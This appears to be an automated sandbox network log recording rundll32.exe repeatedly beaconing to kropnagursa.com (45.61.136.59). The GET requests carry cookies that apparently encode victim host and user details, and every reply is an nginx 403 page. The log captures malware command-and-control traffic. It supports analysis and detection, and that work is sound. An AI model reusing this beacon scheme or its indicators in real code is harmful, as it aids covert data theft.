                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:30.321372032 CET2430INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:30 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            253192.168.2.44994945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:30.626449108 CET2431OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:30.794336081 CET2431INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:30 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            254192.168.2.44995045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:31.096533060 CET2432OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:31.264022112 CET2433INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:31 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            255192.168.2.44995145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:31.567786932 CET2434OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:31.732587099 CET2434INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:31 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            256192.168.2.44995245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:32.033217907 CET2435OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:32.197993994 CET2435INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:32 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            257192.168.2.44995345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:32.504195929 CET2436OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:32.668832064 CET2436INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:32 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            258192.168.2.44995445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:32.989589930 CET2437OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:33.154216051 CET2438INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:33 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            259192.168.2.44995545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:33.451195955 CET2439OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:33.615766048 CET2439INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:33 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            26192.168.2.44972245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:15.184092045 CET2140OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:15.349616051 CET2141INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:15 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            260192.168.2.44995645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:34.397495031 CET2440OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:34.562150955 CET2440INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:34 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            261192.168.2.44995745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:35.087970972 CET2441OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:35.253258944 CET2442INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:35 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            262192.168.2.44995845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:35.642405033 CET2442OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:35.810288906 CET2443INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:35 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            263192.168.2.44995945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:36.111495018 CET2444OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:36.276655912 CET2444INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:36 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            264192.168.2.44996045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:36.579219103 CET2445OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:36.743789911 CET2445INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:36 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            265192.168.2.44996145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:37.066397905 CET2446OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:37.235677004 CET2447INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:37 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            266192.168.2.44996245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:19:37.544500113 CET2447OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:19:37.709291935 CET2448INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:19:37 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
